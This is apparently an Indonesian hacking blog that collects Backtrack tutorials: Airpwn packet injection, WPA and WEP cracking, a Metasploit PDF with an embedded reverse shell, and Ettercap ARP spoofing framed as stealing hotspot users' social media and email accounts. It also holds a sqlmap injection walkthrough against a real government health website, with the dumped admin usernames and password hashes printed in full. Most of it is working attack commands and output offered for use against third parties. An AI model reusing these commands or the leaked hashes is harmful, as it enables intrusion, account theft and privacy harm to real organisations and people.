Minggu, 28 April 2013

Airpwn Installation on Backtrack 5 / 5R1

Airpwn Installation on Backtrack 5 / 5R1

Airpwn adalah sebuah framework untuk wireless packet injection. Airpwn mendengarkan pada wireless packet yang berada di udara dan mencocokkan dengan pola yang telah ditentukan pada konfigurasi file lalu menginjeksikan konten yang telah dimodifikasi oleh penyerang sehingga seolah-olah berasal dari akses poin.
Requirements:
  • Wireless card yang support monitor mode dan packet injection
Dependencies: Steps to install:
Spoiler for download dan extract airpwn:
Code:
wget http://nchc.dl.sourceforge.net/project/airpwn/airpwn/1.4/airpwn-1.4.tgz
tar xzvf airpwn-1.4.tgz
cd airpwn-1.4/
Spoiler for install LORCON (masih didalam direktori airpwn-1.4):

Code:
tar xzvf lorcon-cuurrent.tgz
nano /usr/include/linux/wireless.h
cari string
Code:
#ifndef _LINUX_WIRELESS_H
#define _LINUX_WIRELESS_H
tambahkan dibawahnya
Code:
#include <linux/if.h>
save lalu masuk ke direktori lorcon
Code:
cd lorcon/
./configure
make
make install
Spoiler for install airpwn(masih didalam direktori lorcon:
Code:
cd ..
./configure
make
make install
Test Drive: :D
Spoiler for test drive packet injection:

root@bt:~# airmon-ng stop wlan0
root@bt:~# airmon-ng start wlan0 11
root@bt:~# aireplay-ng --test mon0
15:06:21 Trying broadcast probe requests...
15:06:21 Injection is working!
15:06:22 Found 1 AP

15:06:22 Trying directed probe requests...
15:06:22 00:08:9F:80:8B:37 - channel: 11 - 'Keloran Ceria'
15:06:22 Ping (min/avg/max): 0.779ms/2.176ms/4.507ms Power: -38.90
15:06:22 30/30: 100%

Spoiler for Airpwn session :D:

Quote:
root@bt:~# airpwn -h
usage: airpwn -c <conf file> -d <driver name> [interface options] [options]
<conf file> : configuration file
<driver name> : supported wireless driver name

Interface options:
You can use -i to set all 3 interfaces at once, or use the
other options to set each interface individually.
-i <iface> : sets the listen/control/inject interface
-M <iface> : sets the listen (monitor) interface
-C <iface> : sets the control interface
-I <iface> : sets the injection interface

Optional arguments:
-l <logfile> : log verbose data to a file
-f <filter> : bpf filter for libpcap
-F : assume no FCS values from the monitored interface
-m <max> : Specify the maximum data chunk size (MTU - headers)
-k <WEP key>: key to use to de/encrypt WEP packets. You can
use this option multiple times to specify multiple WEP keys.
-v : increase verbosity (can be used multiple times)
-h : get help (this stuff)

Supported drivers are: wlan-ng hostap airjack prism54 madwifing madwifiold rtl8180 rt2570 rt2500 rt73 rt61 zd1211rw bcm43xx mac80211
Quote:
root@bt:~# airpwn -c testconf -d iwl4965 -i mon0 -vvv
Parsing configuration file..
Opening command socket..
Opening monitor socket..
Opening injection socket..
LORCON - tx80211_setmode(...) is deprecated, please use tx80211_setfunctionalmode(...) instead
Listening for packets...
Channel changing thread starting..
data packet len: 1286, flags: 17 --> DS
Matched pattern for conf 'greet_html'
wrote 256 bytes to the wire(less)
[15:18:28] injecting data for conf 'greet_html' <--- BINGO!
POC:
Spoiler for pic hape Palm Treo Pro WM6.1:

Maaf gambarnya burem banget. soalnya cuman pake webcam laptop
edit:
buat yg dapet error
Code:
airpwn: error while loading shared libraries: liborcon-1.0.0.so: cannot open shared object file: No such file or directory
silahkan ikutin langkah dibawah ini.
Quote:
Originally Posted by ubiqcx View Post
sekedar menambahkan, ane coba step by step tuts diatas. Compile berhasil hanya saja pada saat menjalankan :
Code:
# airpwn 
airpwn: error while loading shared libraries: liborcon-1.0.0.so: cannot open shared object file: No such file or directory
Solusi :
Code:
# ln -s /usr/local/lib/liborcon* /usr/lib
semoga berguna
more googling to do

Hack WPA(wi-fi protected access)

Hack WPA(wi-fi protected access)

Untuk kracking WPA/WPA2 ada sedikit perbedaan dari WEP karena kita membutuhkan wordlist dan mendapatkan handshake dari host target.
mengubah interface menjadi monitoring mode
Quote:
airmon-ng start wlan0
monitoring target
Quote:
airodump-ng -c <channel> --bssid <bssid target> -w psk <interfaces>
sambil monitoring buka terminal baru

memutuskan koneksi client (deauth client)
Quote:
aireplay-ng --deauth 90 -a <bssid> -c <station id> <interfaces>
setelah koneksi putus tunggu client melakukan koneksi ulang. tunggu sampai dapat handshake. Jika udah dapet handshake tahap ini bisa langsung di lewatin

Klo handshake sudah didapat langsung di krack
Quote:
airkrack-ng -w /pentest/passwords/wordlist/<pilih salah satu dictionarynya> -b <bssid> psk*.cap
Untuk wordlist lebih enaknya sih pake wordlist indo, soalnya kita coba pentest di indo
good luck
 

krack WEP

krack WEP(wired equivalent privacy)

Untuk mengetahui apa itu mekanisme security WEP googling aja yah klo sudah tau mari langsung di krack.
Untuk memulainnya ubah dulu interface menjadi monitoring mode
Quote:
airmon-ng stop <interface>
airmon-ng start <interface>
Abis itu coba scanning target
Quote:
airodump-ng -w iseng.wep --channel <channel> <interface>
iseng.wep itu untuk file capture

Klo sudah dapat target, coba putusin koneksi client ke AP
Quote:
aireplay-ng --fakeauth 0 -e <essid target> -a <bssid target> -h <stasion target> <interface>
Setelah terputus kita kumpulkan paket data dari target
Quote:
aireplay-ng --arpreplay -b <bssid target> -h <station target> <interface>
Pada saat mengumpulkan paket data tunggu sampai file .cap nya cukup kira-kira 300 mb kurang lebih, klo sudah cukup tinggal CTRL+C

Jika paket data sudah terkumpul, langsung krack paket datanya
Quote:
airkrack-ng -b <bssid> praktek*.cap
Pada saat melakukan krack waktu cepat atau lambat tergantung dari processor dan banyaknya paket data yang diambil

ini tulisan krack ko jadi krek mulu sih
good luck

metasploit 4

untuk pengguna metasploit 4 (yang official dari repo Backtrack, bukan download dari rapid7) ini ada cara untuk mengatasi Failed to connect to the database ternyata seperti dugaan ane kemaren, si user msf3 ini belum dibuatin role di server database postgresql nya. waktu dicek ternyata cuman ada user postgres.
sebenernya kita bisa sih langsung connect pake database punya user postgres dengan memodifikasi file /opt/metasploit/config/database.yml pake detail user postgres yang ada di /opt/metasploit/properties.ini
tapi biar afdol aja metasploit kok connectnya ke database postgres  kudunya msf3 dong

STEPS:
Code:
root@bt:~# cd /opt/metasploit/postgresql/bin/

root@bt:/opt/metasploit/postgresql/bin# ./createuser -PE msf3

Enter password for new role: (password msf3)

Enter it again: (password msf3)

Shall the new role be a superuser? (y/n) y

Password: (password postgres)

root@bt:/opt/metasploit/postgresql/bin# ./createdb --host=localhost --port=7337 --user=msf3 msf3dev

Password: (password msf3)


*)Untuk password msf3 & password postgres bisa diliat di: /opt/metasploit/properties.ini

kalo pengen liat user sama database yang udah dibikin
Code:
root@bt:/opt/metasploit/postgresql/bin# su postgres psql

Password: (password postgres)

psql.bin (8.4.0)

Type "help" for help.



postgres=# \du

postgres=# \l

Client Side Attack with Evil

Ubuntu for PenTest - Client Side Attack with Evil .pdf

Ingin kembali melakukan repost dari tutorial sendiri di thread yang udah di-closed...
Spoiler for tutz:

Pada kesempatan kali ini, ane ingin coba sedikit berbagi trik dari sekian trik yang ada dalam Client Side Attack...
Inti serangan ini memanfaatkan kelemahan dari pengguna yang dijadikan target, misalnya terlalu percaya dengan kiriman dokumen2 yang tidak jelas atau tidak meng-update sistem keamanan yang ada pada komputer nya..
Quote:
Untuk bahan persiapan :
  • OS : BackTrack 5 (bisa juga 4, 3 atau 2) --> Bebas selama tools di bawah ini tersedia...
  • Metasploit...
  • File .pdf asli (bebas untuk ukuran dan file nya)...
  • Secangkir teh untuk menunggu target...
  • Dan tentunya target dengan Windows OS...
Code:
Pengujian dilakukan di dalam Virtual Machine... :)
IP Attacker : 192.168.1.215
IP Target : 192.168.1.50
1. Langkah awal, masuk ke konsole metasploit melalui terminal (dalam mode root yach) dan ketikan perintah :
Code:
root:/opt/framework-3.7.0/msf3# msfpayload windows/shell/reverse_tcp LHOST=192.168.1.215 LPORT=443 X > /tmp/nama_program.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell/reverse_tcp
Length: 290
Options: LHOST=192.168.1.215,LPORT=443
/** Dengan perintah di atas, maka kita terlebih dahulu membuat program yang sudah berisikan payload yang tentunya terdapat IP kita...  program ini disimpan dalam direktori /tmp/ seperti yang tertulis pada perintah di atas...
*/


2. Lanjutkan dengan meng-copy-kan file .pdf yang asli ke direktori /tmp...
3. Lalu, masuk ke Metasploit :
Code:
root:/opt/framework-3.7.0/msf3# msfconsole[/quote]

4. Pada Metasploit, gunakan module adobe pdf embedded exe dan buat file fake.pdf nya (perhatikan saja langkahnya) :
[quote]msf > use windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.1.215
LHOST => 192.168.1.215
msf exploit(adobe_pdf_embedded_exe) > set LPORT 443
LPORT => 443
msf exploit(adobe_pdf_embedded_exe) > set EXENAME /tmp/nama_program.exe
EXENAME => /tmp/payload.exe
msf exploit(adobe_pdf_embedded_exe) > set FILENAME FakeFile.pdf
FILENAME => FakeFile.pdf
msf exploit(adobe_pdf_embedded_exe) > set INFILENAME /tmp/OriginalFile.pdf
INFILENAME => /tmp/OriginalFile.pdf
msf exploit(adobe_pdf_embedded_exe) > set OUTPUTPATH /tmp/
OUTPUTPATH => /tmp/
msf exploit(adobe_pdf_embedded_exe) > exploit

Started reverse handler on 192.168.1.215:443
Reading in '/tmp/OriginalFile.pdf'...
Parsing '/tmp/OriginalFile.pdf'...
Parsing Successful.
Using '/tmp/nama_program.exe' as payload...
Creating 'FakeFile.pdf' file...
Generated output file /tmp/FakeFile.pdf
Exploit completed, but no session was created.
/** Perhatikan bahwa Payload yang di-set pada module ini harus sama dengan Payload yang kita sett sebelumnya di awal... Kemudian hasil keluaran dari perintah ini akan berupa FakeFile.pdf yang akan berada pada direktori /tmp...
*/


5. Lanjutkan dengan menunggu target untuk membuka file FakeFile.pdf... Namun, persiapkan dulu hal ini :
Code:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.215
LHOST => 192.168.1.215
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit

Started reverse handler on 192.168.1.215:443
Starting the payload handler...

Sending stage (240 bytes) to 192.168.1.50
Command shell session 1 opened (192.168.1.215:443 -> 192.168.1.50:1042)


Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>
Spoiler for solusi:

Untuk solusi penanganan hal ini :
Update lah selalu AntiVirus Anda... Simple kan?
Tanda2 mencurigakan dari file ini terletak pada saat kita membukanya... Saat kita buka file palsu ini, maka dia akan mengeluarkan warning ynag mengatakan file original nya tidak ada, apakah mau dipisah atau tidak... Dipisah di sini maksudnya melepas payload yang telah kita masukan sebelumnya ke file asli sehingga nanti akan keluar file aslinya tanpa payload di dalamnya...
Namun, ketika hal ini telah dilakukan, maka attacker telah berhasil masuk ke sistem target seperti yang telah dijelaskan di atas... Jadi, bila bertemu situasi seperti ini, lebih baik lupakan saja untuk membukanya atau buka dalam keadaan Anda tidak terhubung ke InterNet... 

Sniffing

Quote:Original Posted By Pisang.gor3ng


oh ya gan itu kalo di artikelnya menggunakan flag --method sedangkan di sqlmap pada bt 5 gak ada command

--method nah trus kita make apa ya?

langsung --data
ex :
Quote:python sqlmap.py -u "http://url.com/login.php" --data "username=User&pass=password&Submit=submit" --threads 10 --random-agent
Quote:Original Posted By aryuki
mastah ane mw tanya seputar ettercap..
kebetulan ane coba tuts agan murray_here yg ini

Code:
ettercap -Tq -i wlan0 -M arp:remote -P arp_cop /ip_router/ //

dan berjalan dengan baik.. dan ane dpet tuts dri gugel yg punya fungsi sama..
kyk ini:
Code:
echo '1' > /proc/sys/net/ipv4/ip_forward

arpspoof -i interface ip_ruter

ettercap -T -q -i 'interface 

kedua tut tersebut berjalan dengan baik, tp klo diliat dr pndangan nubie lbh simpel tuts nya agan murray_here.. yg jd pertanyaan.. apa kelebihan dan kekurangan dari masing2 tuts diatas..??
dan 1 lg, apa perlu settingan di /etc/etter.conf iptables nya diaktifin(diilangin pagernya #)???

mohon maaf klo salah kata..

ngilangin tanda pager / aktifin command iptables di ettercap.conf itu dibutuhkan saat ettercap dipake untuk tekhnik man in the middle attack,

contoh dns spoofing.

dns spoofing akan mengganti setiap request dns menjadi ip attacker, dan disini akan diperlukan nya ip forwarding untuk forward paket data.

sama hal nya juga kalo lagi ssl sniff.

nge uncomment / ngilangin tanda pagar di etter.conf itu hanya dilakukan sekali saja, gak perlu berulang kali.

actually ngilangin tanda pagar itu seriously needed.

Quote:Original Posted By IkhsanBurhanAli

hehehe...makasih gan reply-annya

tapi maksud ane bukan cara protect-nya gan, tapi ane mo tahu kenapa sniffing ane ga berhasil
yang ane sniffing sih pake firewall dari windows, ada yang pake eset smart security / antivirus, ada juga yang pake kaspersky internet security. jadi kemungkinan kaspersky itu yah yang bikin sniffing gagal ?

ada cara lain ga gan buat nembus si KIS ini ?


duh pertanyaan lo sebelumnya itu gak jelas gan, gw jadi salah jawab dah hahaha.

kalo mau nanya kayak curhat aja napa gan, panjang panjang sekalian, gak paham gak paham sekalian, jangan setengah2
sebenernya, sniffing / spoofing itu old style,. apalagi itu udah termasuk ke dalam ancaman yang ditanggapi serius sama vendor antivirus dan firewall.

sekarang tekhnik lebih ampuh itu menyamar jadi router, dengan cara sebenar benar nya. gw kasih skenario nya aja ya.

wlan0 -> konek internet lancar
wlan1 -> bikin akses point dengan teknik piggybacking

redirect semua traffic dari wlan1 ke wlan0, backtrack setup dhcp gateway, redirect port 80 ke paros proxy / aplikasi logging traffic lainnya. tunggu, nikmatin hasil.

yang kayak begini, biar target mau pake firewall / antivirus macam apa juga, kalo dia gak ngeh lagi konek ke akses point / gateway attacker pasti kena ke sniff.

ettercap sniffing

ini yang biasa dilakuin di hotspot,
untuk dapetin account facebook, twitter, email ym, gmail dan lain masuk

Code:
ettercap -Tq -i wlan0 -M arp:remote -P arp_cop /ip_router/ //
setelah jalan jangan lupa pencet P lalu tulis auto_add biar target / victim nya otomatis nambah di list ip nomor 2

sqlmap how to *SQL INjection

halo gays, kemarin pas ujian semester di TK Cendrawasih, saya mendapatkan soal disuruh ngejelasin sqlmap, saya yakin ini tugas dari Bu Wiwid.
ini adalah contoh tutorial sederhana dengan sqlmap, adapun troubleshooting tentang sqlmap dan lain lain akan saya buat di next tutorial.
“sqlmap adalah tools untuk melakukan testing penetrasi sql injection pada suatu web, tools ini menurut saya, tools sql injection yang free paling lengkap untuk saat ini, walaupun ada havij, tapi menurut saya havij kurang advanced, havij lebih banyak dipakai oleh newbie newbie, karena memang kegunaan nya yang sangat simple untuk sekali attack sql injection.”
kali ini saya kasih contoh di http://www.depkes.go.id/, dengan flaws di component joomla depkesdownload.
*perhatian apa yang saya ajarkan ialah ilegal, penggunaan materi ini semata mata untuk tujuan pembelajaran, dan pihak ke tiga atau ke dua dimohon untuk pemahaman nya ini semata semata AUDIT Gratis dari saya tentang website depkes, sebelum ada hacker yang melakukan perusakan terhadap web tersebut.
saya akan selalu menggunakan flag default –threads dan –random-agent dengan kegunaan :
1--threads : max number sqlmap mencoba untuk membuka concurrent http connections.
2--random-agent : load random user agent dari default sqlmap,
total user agent yang bisa digunakan ialah 2078 random user agent.
1$ wc txt/user-agents.txt
22078 23092 198475 txt/user-agents.txt
penggunaan sqlmap secara standart :
1root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "URL" --random-agent --threads X --banner --dbs --tables --columns --dump --dumpall
1. test injeksi dengan men-fetch banner mysql (versi mysql)
01root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21&folderid=51" --random-agent --threads 10 --banner
02sqlmap/1.0-dev (r4370) - automatic SQL injection and database takeover tool
04[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
05[*] starting at 22:09:14
06[22:09:14] [INFO] fetched random HTTP User-Agent header from file '/root/sqlmap-dev/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5
07[22:09:15] [INFO] using '/root/sqlmap-dev/output/www.depkes.go.id/session' as session file
08[22:09:15] [INFO] testing connection to the target url
09[22:09:15] [INFO] testing if the url is stable, wait a few seconds
10[22:09:16] [INFO] url is stable
11---8<------ snip
12[22:11:31] [INFO] GET parameter 'folderid' is 'MySQL > 5.0.11 AND time-based blind' injectable
13[22:11:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
14[22:11:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
15[22:11:36] [INFO] testing 'Generic UNION query with Microsoft Access () comment (NULL) - 1 to 10 columns'
16GET parameter 'folderid' is vulnerable. Do you want to keep testing the others? [y/N] n
17sqlmap identified the following injection points with a total of 445 HTTP(s) requests:
18---
19Place: GET
20Parameter: folderid
21Type: boolean-based blind
22Title: AND boolean-based blind - WHERE or HAVING clause
23Payload: option=com_depkesdownload&itemid=21&folderid=51' AND 8184=8184 AND 'TEzv'='TEzv
24Type: AND/OR time-based blind
25Title: MySQL > 5.0.11 AND time-based blind
26Payload: option=com_depkesdownload&itemid=21&folderid=51' AND SLEEP(5) AND 'ISyk'='ISyk
27---
28[22:14:12] [INFO] the back-end DBMS is MySQL
29[22:14:12] [INFO] fetching banner
30[22:14:12] [INFO] retrieving the length of query output
31[22:14:12] [INFO] retrieved: 6
32[22:14:21] [INFO] retrieved: 5.0.45
33web server operating system: Linux CentOS 5
34web application technology: Apache 2.2.3, PHP 5.1.6
35back-end DBMS: MySQL 5.0.11
36banner: '5.0.45'
37[22:14:21] [WARNING] HTTP error codes detected during testing:
38404 (Not Found) - 198 times
39[22:14:21] [INFO] Fetched data logged to text files under '/root/sqlmap-dev/output/www.depkes.go.id'
40[*] shutting down at 22:14:21
apa yang saya lakukan pertama kali untuk memfetch banner dari dbms itu penting, karena dengan melakukan injeksi pancingan ke web, sqlmap akan mendapatkan route map dari injeksi website tersebut, sehingga serangan injeksi selanjutnya akan lebih mudah bagi sqlmap.
pada awal injeksi menggunakan sqlmap, disarankan untuk men-fetch banner terlebih dahulu, dengan metode tebak tebak an injeksi ini sqlmap akan lebih gampang membuild road map dari jenis injeksi dbms si website, sekedar sharing saya pernah tidak men-fetch banner terlebih dahulu melainkan langsung dengan metode –dbs, namun hasilnya gagal, ketika dicoba lain kali dengan injeksi –banner sqlmap berhasil men-injeksi web tersebut, dan viola kesana nya pun sqlmap mudah untuk fetch data.
dari hasil injeksi fetch banner mysql, kita mendapatkan positive impact dari target, yaitu keluarnya hasil untuk versi DBMS yaitu : MySQL 5.0.11 dengan tipe injeksi MySQL Blind.
2. fetch user yang digunakan, dan db yang sedang digunakan dengan flag (–current-user dan –current-db)
langkah ke dua ialah analisis user yang dipakai di DBMS dan DB yang sedang digunakan pada website tersebut.
01root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21&folderid=51" --random-agent --threads 10 --current-user --current-db
02--------8<--- snip
03[22:24:23] [INFO] the back-end DBMS is MySQL
04web server operating system: Linux CentOS 5
05web application technology: Apache 2.2.3, PHP 5.1.6
06back-end DBMS: MySQL 5.0.11
07[22:24:23] [INFO] fetching current user
08[22:24:23] [INFO] retrieving the length of query output
09[22:24:23] [INFO] read from file '/root/sqlmap-dev/output/www.depkes.go.id/session': 20
10[22:24:46] [INFO] retrieved: website-in@localhost
11current user: 'website-in@localhost'
12[22:24:46] [INFO] fetching current database
13[22:24:46] [INFO] retrieving the length of query output
14[22:24:46] [INFO] retrieved: 6
15[22:24:55] [INFO] retrieved: portal
16current database: 'portal'
17[22:24:55] [INFO] Fetched data logged to text files under '/root/sqlmap-dev/output/www.depkes.go.id'
18[*] shutting down at 22:24:55
3. fetch list database yang bisa dihandle oleh user website-in@localhost dengan flag (--dbs)
selanjutnya kita melakukan fetching list database, dengan mengetahui list databse yang lain kita dapat bebas melakukan injeksi pada setiap database yang available untuk di injeksi.
01root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21&folderid=51" --random-agent --threads 10 --dbs
02--------8<--- snip
03[22:36:06] [INFO] the back-end DBMS is MySQL
04web server operating system: Linux CentOS 5
05web application technology: Apache 2.2.3, PHP 5.1.6
06back-end DBMS: MySQL 5.0.11
07[22:36:06] [INFO] fetching database names
08[22:36:06] [INFO] fetching number of databases
09[22:36:06] [INFO] retrieved: 2
10[22:36:08] [INFO] retrieving the length of query output
11[22:36:08] [INFO] retrieved: 18
12[22:36:31] [INFO] retrieved: information_schema
13[22:36:31] [INFO] retrieving the length of query output
14[22:36:31] [INFO] retrieved: 6
15[22:36:40] [INFO] retrieved: portal
16available databases [2]:
17[*] information_schema
18[*] portal
19[22:36:40] [INFO] Fetched data logged to text files under '/root/sqlmap-dev/output/www.depkes.go.id'
20[*] shutting down at 22:36:40
ternyata hanya 2 database yang avail, yaitu information_schema dan database portal, kita langsung injeksi untuk database portal saja yah, information_schema nya silahkan googling sendiri.
4. fetch list tables di database portal dengan flag (-D portal --tables)
1root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21&folderid=51" --random-agent --threads 10 -D portal --tables
karena log / verbose yang dihasilkan panjang sekali, kita bisa langsung cek hasil dari setiap log injeksi di folder output/web
berikut contoh list tables yang berhasil di injeksi dari database portal, ada 89 tables.
01root@ubuntu:~/sqlmap-dev/output/www.depkes.go.id# cat log
02-----8<---- snip ---
03Database: portal
04[89 tables]
05+------------------------------+
06| jos_assignments |
07| jos_banner |
08| jos_bannerclient |
09| jos_bannertrack |
10| jos_categories |
11| jos_components |
12| jos_contact_details |
13| jos_content |
14| jos_content_frontpage |
15| jos_content_rating |
16| jos_core_acl_aro |
17| jos_core_acl_aro_groups |
18| jos_core_acl_aro_map |
19| jos_core_acl_aro_sections |
20| jos_core_acl_groups_aro_map |
21| jos_core_log_items |
22| jos_core_log_searches |
23| jos_downloads |
24| jos_downloads_blob |
25| jos_downloads_category |
26| jos_downloads_classify |
27| jos_downloads_containers |
28| jos_downloads_file_classify |
29| jos_downloads_files |
30| jos_downloads_folders |
31| jos_downloads_log |
32| jos_downloads_repository |
33| jos_downloads_reviews |
34| jos_downloads_structure |
35| jos_downloads_text |
36| jos_groups |
37| jos_hwdvidsantileech |
38| jos_hwdvidscategories |
39| jos_hwdvidsfavorites |
40| jos_hwdvidsflagged_groups |
41| jos_hwdvidsflagged_videos |
42| jos_hwdvidsgroup_membership |
43| jos_hwdvidsgroup_videos |
44| jos_hwdvidsgroups |
45| jos_hwdvidsgs |
46| jos_hwdvidslogs_archive |
47| jos_hwdvidslogs_favours |
48| jos_hwdvidslogs_views |
49| jos_hwdvidslogs_votes |
50| jos_hwdvidsplugin |
51| jos_hwdvidsrating |
52| jos_hwdvidsss |
53| jos_hwdvidsvideos |
54| jos_jdownloads_cats |
55| jos_jdownloads_config |
56| jos_jdownloads_files |
57| jos_jdownloads_license |
58| jos_jdownloads_templates |
59| jos_menu |
60| jos_menu_types |
61| jos_messages |
62| jos_messages_cfg |
63| jos_migration_backlinks |
64| jos_mod_apotik |
65| jos_mod_puskesmas |
66| jos_mod_puskesmas15072011 |
67| jos_mod_puskesmas24112010 |
68| jos_mod_puskesmas_23012011 |
69| jos_mod_puskesmas_old |
70| jos_mod_rumah_sakit |
71| jos_modules |
72| jos_modules_menu |
73| jos_newsfeeds |
74| jos_permissions |
75| jos_phocadownload |
76| jos_phocadownload_categories |
77| jos_phocadownload_licenses |
78| jos_phocadownload_sections |
79| jos_phocadownload_settings |
80| jos_phocadownload_user_stat |
81| jos_plugins |
82| jos_poll_data |
83| jos_poll_date |
84| jos_poll_menu |
85| jos_polls |
86| jos_rokdownloads |
87| jos_rokversions |
88| jos_sections |
89| jos_session |
90| jos_stats_agents |
91| jos_swmenufree_config |
92| jos_templates_menu |
93| jos_users |
94| jos_weblinks |
95+------------------------------+
5. fetch isi kolum pada setiap tables dengan flag (--columns)
setelah itu mari kita ke final step pada setiap langkah langkah menginjeksi suatu web, yaitu memfetch isi dari tables. karena tabel yang menarik dari list diatas yaitu tabel users, maka langsung kita fetch isi tabel tersebut
sebelumnya kita fetch dulu list kolum pada tabel tersebut, dan fetch data dari kolum hanya yang penting saja, kita fetch dengan flag (-D portal -T jos_users --columns)
01root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21&folderid=51" --random-agent --threads 10 -D portal -T jos_users --columns
02----8<----snip
03+---------------+---------------------+
04| Column | Type |
05+---------------+---------------------+
06| activation | varchar(100) |
07| block | tinyint(4) |
08| email | varchar(100) |
09| gid | tinyint(3) unsigned |
10| id | int(11) |
11| lastvisitDate | datetime |
12| name | varchar(255) |
13| params | text |
14| password | varchar(100) |
15| registerDate | datetime |
16| sendEmail | tinyint(4) |
17| username | varchar(150) |
18| usertype | varchar(25) |
19+---------------+---------------------+
20[02:39:42] [INFO] Fetched data logged to text files under '/root/sqlmap-dev/output/www.depkes.go.id'
21[*] shutting down at 02:39:42
sekarang kita akan men-fetch hanya isi dari kolum (username, dan password), dengan flag (-D portal -T jos_users -C username,password --dump), flag --dump berguna untuk men-dump isi dari kolum kedalam log sqlmap sehingga bisa kita liat secara permanen di hardisk tanpa melakukan injeksi ulang (logging)
1root@ubuntu:~/sqlmap-dev# ./sqlmap.py -u "http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21&folderid=51" --random-agent --threads 10 -D portal -T jos_users -C username,password --dump
hasil yang terlog di folder log/web
01root@ubuntu:~/sqlmap-dev# cat output/www.depkes.go.id/log
02----------8<----snip
03Database: portal
04Table: jos_users
05[11 entries]
06+-------------------------------------------------------------------+---------------+
07| password | username |
08+-------------------------------------------------------------------+---------------+
09| 35d1b3c70e13825c0d4a67843adbf6ef:sQEMDKp8NKGSLMMKP5DocOSMwO1uCV3l | admin |
10| f45161dd4038a5946c1dbcc59dbc0d6a:JUYQ0bIg2mt0XrIotHzVRw4yTowVCgIi | andri |
11| 06b60c7bbdd5e197810d9018c3640ccd:MXghhJp9fJc8uadkcrZC30dZhyn3JnK7 | dewi_roro |
12| 1e41bc000f1461a1410823fcdd7f0c22:eNKOmRJO35Mxa5PqI8jJAxAR7mN4qPxO | ipunk |
13| 30f9ade9382291ffaf41ba0e35fa54ca:EOnhJGXlt5LLl0cefNLleOYQ8OCCgloc | ismail |
14| d8c27e4de63a2c48e4a66ec8d88160c8:I30jspHGk6lPca18gwX1k069vqopqnoc | isti |
15| faf5fc5f3d5901d79a396c62cacdc639:dRzIfNbjgAkj5Bco281VE1y6PiaKQLLa | Miemie Widya |
16| 42fac0d700127746caac2c225b1f0427:pGFxjurnXno3dLMZMxwhdGe65NsI0zDl | puskom |
17| d7c49e113aca936ed03c452c71784e7b:7mABDrLJBxFSbLyiDTcCi2Xr5agcxeGc | rsud meureudu |
18| 27a94db23c3d203edbcd7314a998bf9e:R3x0ypx8lbe7yrAylDbixbf0pDdZ2KDb | silver |
19| 50a09da3b0d90b736e939862ef565c4d:YGJbFZxWVEayGlylKuyLvmY5wadgQy5K | supriyono |
20+-------------------------------------------------------------------+---------------+
adapun csv dari hasil dump ada berada di subfolder dump di setiap folder log web tersebut

untuk melakukan full dump satu kolum bisa menggunakan flag (-D portal -T jos_users --columns --dump) namun isinya berantakan dikarenakan banyak jumlah kolum, jadi lebih baik kita fetch kolum yang dianggap perlu saja, berikut dari hasil full dump untuk tabel jos_users : jos_users.txt
hal terbaik dari teknik sql injection menggunakan tools ialah jika digabungkan dengan tools proxychains, yang akan menghasilkan tools hack website yang stealth, powerfull namun sederhana.
Good Luck!

DoS di jaringan IPv6

Quote:
Originally Posted by ydoeulovemie View Post
Gw lg skripsi ttg DoS di jaringan IPv6.. Dan gw awam banget..
Mau tanya teknis..
1. Utk awal gw pake virtualbox, gimana cara hubungin 2 virtual OS biar nyambung yah? Pake Host only adapter atau internal adapter?
2. Gimana cara aktifin ipv6 only network?
3. Gimana cara DoS komputer/virtual os seberang? Cuma ada 2 workstation dlm 1 environment, attacker dan server aja..
Gw pake kabel ethernet.. Ga pake wlan..

gw uda cari2 referensi, video, beli tutor backtrack, ga ada yg bahas..

Thanks banget buat suhu2 di sini..

wah si unyu, kebetulan nih ipv6, coba research ini, kelar deh skripsi lo wkwk :

Code:
http://samsclass.info/ipv6/proj/flood-router6a.htm
nih juga buat bahan bacaan lo,

Code:
1. http://www.vintage-computer.com/vcforum/showthread.php?23885-What-does-IPv6-mean-for-DOS
2. http://it.slashdot.org/story/07/05/11/2247245/IPv6-Flaw-Could-Greatly-Amplify-DDoS-Attacks
3. http://portal.acm.org/citation.cfm?id=1259588.1259893&preflayout=tabs
4. http://www.sixxs.net/forum/?msg=general-850316
5. http://docs.google.com/viewer?a=v&q=cache:mRfr-YZx4KUJ:iaw2009.iitm.ernet.in/outcome/ipv6/IPv6.pdf+ipv6+and+ddos&hl=en&pid=bl&srcid=ADGEEShCwp-JjygfzzB_Sfm8oe2ECfZ-Km-YTfiBTpmD5tkG3E5lXWoqXUHDqSXGAE2TXwPV9eWuoUT6UIY3Nqd7ObKgEweWh1-ED_x53WkrXqFGhZ4mEphx4-C3vNHgtmzohqD2W2ia&sig=AHIEtbQ6hJ3vS0HyOFePnYVzCdEn2ufYHg
